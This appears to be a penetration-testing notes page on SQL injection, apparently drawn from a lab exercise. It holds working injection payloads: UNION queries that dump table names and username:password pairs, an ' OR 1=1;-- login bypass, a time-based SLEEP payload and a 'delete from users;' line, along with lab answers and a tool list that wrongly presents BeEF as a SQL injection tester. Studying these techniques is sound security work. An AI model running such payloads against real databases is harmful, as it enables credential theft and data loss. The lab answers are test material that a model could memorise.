SQL Injection

Description

SQL Injection is a type of security vulnerability that occurs in web applications that use SQL as a back-end database. It allows an attacker to inject malicious code into an SQL statement and execute it on the database. This can result in unauthorized access to sensitive information, data modification, or even data deletion. The vulnerability arises when user-supplied input is not properly validated and escaped before being used in an SQL query. By exploiting SQL Injection, an attacker can bypass authentication mechanisms, retrieve sensitive information such as passwords, and execute arbitrary commands on the database server.

Techniques

The following are the steps for using SQL Injection as a penetration tester:

Discover: Find out if the web application is vulnerable to SQL Injection by manually sending crafted input to the application and observing its behavior.

Exploit: If the application is found to be vulnerable, use tools and techniques to exploit the vulnerability and gain access to sensitive data.

Assessment: Once the vulnerability has been exploited, assess the impact of the vulnerability by examining the data that has been exposed, the privileges that have been gained, and the potential for further exploitation.

Reporting: Provide a report to the organization that details the vulnerability, its impact, and the recommended remediation steps.

Types

UNION-based SQL injection: This type of SQL injection exploits the UNION SQL operator to combine the results of multiple SELECT statements into a single result set.

Error-based SQL injection: This type of SQL injection is based on error messages generated by the database in response to malicious input.

Blind SQL injection: This type of SQL injection is performed when an attacker is unable to see the results of their attacks directly, but must infer the results through indirect means such as observing changes in application behavior.

Boolean-based SQL injection: This type of SQL injection is based on the use of Boolean operators to manipulate the behavior of an SQL statement.

Time-based SQL injection: This type of SQL injection exploits the time it takes for an SQL statement to execute to extract information from a database.

Resources

select * from users;

select username,password from users;

select * from users where username='admin';

select * from users where username != 'admin';

select * from users where username='admin' or username='jon';

select * from users where username='admin' and password='p4ssword';

select * from users where username like 'a%';

select * from users where username like '%n';

select * from users where username like '%mi%';

The UNION statement combines the results of two or more SELECT statements to retrieve data

SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;

insert into users (username,password) values ('bob','password123');

update users SET username='root',password='pass123' where username='admin';

delete from users where username='martin';

delete from users;

In-Band SQL Injection

Error-Based SQL Injection

Union-Based SQL Injection

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR ' ') FROM staff_users

select * from users where username='%username%' and password='%password%' LIMIT 1;

' OR 1=1;--

select * from users where username='' and password='' OR 1=1;

Answers:

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR ' ') FROM staff_users

referrer=admin123' UNION SELECT SLEEP(5),2 from users where username like β€˜admin’ and password like β€˜4961’;

Remediation:

Prepared Statements (With Parameterized Queries): Input Validation: Escaping User Input:

Tools

sqlmap: A popular tool that automates the process of detecting and exploiting SQL Injection vulnerabilities.

OWASP ZAP: A web application security scanner that can detect SQL Injection vulnerabilities and other types of vulnerabilities.

Burp Suite: A comprehensive web application security testing platform that includes features for detecting and exploiting SQL Injection vulnerabilities.

BeEF: A browser exploitation framework that can be used to test for SQL Injection vulnerabilities.

sqlninja: A tool specifically designed for exploiting SQL Injection vulnerabilities in Microsoft SQL Server.

Havij: An automated SQL Injection tool that can be used to test for vulnerabilities in web applications.

Absinthe: An automated SQL Injection tool that can be used to test for vulnerabilities in web applications.

SQL Injection

  • http://pentestmonkey.net/category/cheat-sheet/sql-injection

  • https://github.com/Xyntax/CDK/wiki

Last updated